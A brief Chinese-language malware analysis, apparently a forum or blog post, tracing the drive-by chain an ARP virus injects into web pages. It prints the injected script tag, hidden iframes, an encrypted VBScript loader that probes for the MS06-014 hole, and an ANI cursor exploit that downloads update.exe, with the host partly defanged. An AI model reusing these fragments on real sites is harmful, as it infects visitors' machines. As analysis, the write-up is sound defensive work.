ARP病毒自动加入的网址为:
/--- <script language=javascript src=hxxp://google**.17***173**8.org/ad***.js></script> ---/
ad***.js 包含代码:
/--- document.write('<iframe width=0 height=0 src="hxxp://google**.17***173**8.org/p*d***.htm"></iframe>'); ---/
p*d***.htm 首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。
t 的值解密后为VBScript脚本:
/--- <script language=VBScript> on error resume next Set downf = document.createElement("object") downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36" str="Microsoft.XMLHTTP" Set O = downf.CreateObject(str,"") if Not Err.Number = 0 then err.clear 'msgbox "没有0614漏洞,页面转到ms07004EXP!" document.write("<iframe width=""0"" height=""0"" src=""ms07017.htm""></iframe>") else 'msgbox "存在0614漏洞,页面转到MS0614的EXP!" document.write("<iframe width=""0"" height=""0"" src=""06014.htm""></iframe>") end if </script> ---/
ms07017.htm 与 p*d***.htm 相似,首先引入文件jscode.js,其内容是使用eval()执行自定义函数,从而产生自定义函数utf8to16()、xxtea_decrypt()、base64DecodeChars(),用于解密并输出变量t的值。
解密后的t值为JavaScript脚本,功能是如果cookie变量“MTV”不存在,则创建,并输出sscape()编码的代码:
/--- <script src="ani.js"></script> ---/
ani.js的内容为JavaScript脚本,包含代码:
/--- document.writeln(“<DIV style=/“CURSOR: url(hxxp:////google**.17***173**8.org//ani.jpg)/”><//DIV><//DIV><//BODY><//HTML>”); ---/
ani.jpg利用 ANI漏洞下载 update.exe